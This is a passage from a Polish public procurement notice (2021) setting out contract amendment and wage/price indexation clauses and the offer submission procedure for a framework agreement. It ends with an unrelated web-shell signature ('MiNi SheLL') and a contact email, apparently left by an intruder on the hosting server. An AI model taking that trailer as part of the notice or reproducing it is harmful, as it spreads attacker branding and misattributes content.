postanowień Umowy, z zastrzeżeniem § 14 ust. 2, mogą być dokonywane wyłącznie za zgodą obu Stron, wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności.<br/>2.	Zamawiający przewiduje możliwość zmiany postanowień Umowy lub Zlecenia, w przypadku:<br/>1)	zmiany obowiązujących regulacji prawa związanych z przedmiotem Umowy, wywołujących konieczność jej zmiany;<br/>2)	zmiany stawki podatku od towarów i usług dla usług należących do przedmiotu zamówienia w toku wykonywania Umowy;<br/>3)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>4)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne;<br/>5)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz.U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572);<br/>6)	gdy zmiany, o których mowa w pkt 2-5 będą miały wpływ na koszt wykonania Zlecenia, co Wykonawca jest zobowiązany udowodnić;<br/>7)	aktualizacji danych Wykonawcy, w szczególności poprzez zmianę nazwy przedsiębiorstwa, adresu siedziby, formy prawnej Wykonawcy;<br/>8)	przedłużenia okresu obowiązywania Umowy na podstawie § 3 ust. 4 lub 6;<br/>9)	gdy Zamawiający zaakceptuje zmianę, o której mowa w § 6 ust. 6 i 7. <br/>3.	Zgodnie z art. 439 ustawy Pzp, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją Zlecenia o więcej niż 20% wartości wynagrodzenia brutto z tytułu danego Zlecenia, Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia, pod warunkiem, że Wykonawca wykaże związek tych materiałów lub kosztów z przedmiotem Zlecenia oraz przedstawi dokumenty potwierdzające zaistnienie zmiany ceny materiałów lub kosztów związanych z realizacją Zlecenia.<br/>4.	Zmiana wynagrodzenia, o której mowa w ust. 3 obowiązuje od miesiąca następującego po miesiącu, w którym Strony zawrą stosowny aneks.<br/>5.	Zmiana ceny materiałów lub kosztów związanych z realizacją Zlecenia, o której mowa w ust. 3, może skutkować zmianą wynagrodzenia należnego Wykonawcy o nie więcej niż 10% wartości wynagrodzenia brutto z tytułu danego Zlecenia oraz może być dokonana nie częściej niż co 6 miesięcy.<br/>6.	Maksymalna wartość zmiany wynagrodzenia należnego Wykonawcy jaką dopuszcza Zamawiający na podstawie ust. 3-5 nie może przekroczyć 15% wynagrodzenia brutto z tytułu danego Zlecenia.<br/>7.	W celu zawarcia aneksu, każda ze Stron może wystąpić do drugiej Strony z wnioskiem o dokonanie zmiany wysokości wynagrodzenia należnego Wykonawcy, wraz z uzasadnieniem zawierającym w szczególności szczegółowe wyliczenie całkowitej kwoty, o jaką wynagrodzenie Wykonawcy powinno ulec zmianie, oraz ze wskazaniem daty, od której nastąpiła bądź nastąpi zmiana wysokości kosztów wykonania umowy uzasadniająca zmianę wysokości wynagrodzenia należnego Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-15 10:15</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę za pośrednictwem „Formularza złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu oraz na ePUAP. Sposób zaszyfrowania oferty opisany został w „Instrukcji użytkownika” dostępnej na stronie: https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-15 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-13</span></h3> <h3 class="mb-0">8.19.) Umowa ramowa: </h3> Umowa ramowa zawarta zostanie z kilkoma wykonawcami <h3 class="mb-0">8.20.) Przewiduje się ograniczenie liczby uczestników umowy ramowej: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.21.) Maksymalna liczba wykonawców, z którymi zamawiający zawrze umowę ramową: <span class="normal">3</span></h3> <h3 class="mb-0">8.22.) Zamawiający udziela zamówień na podstawie art. 314 ust. 1 pkt 1, 2 albo 3 ustawy: <span class="normal">Zamawiający udziela zamówień na podstawie art. 314 ust. 1 pkt 3 ustawy</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-01 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com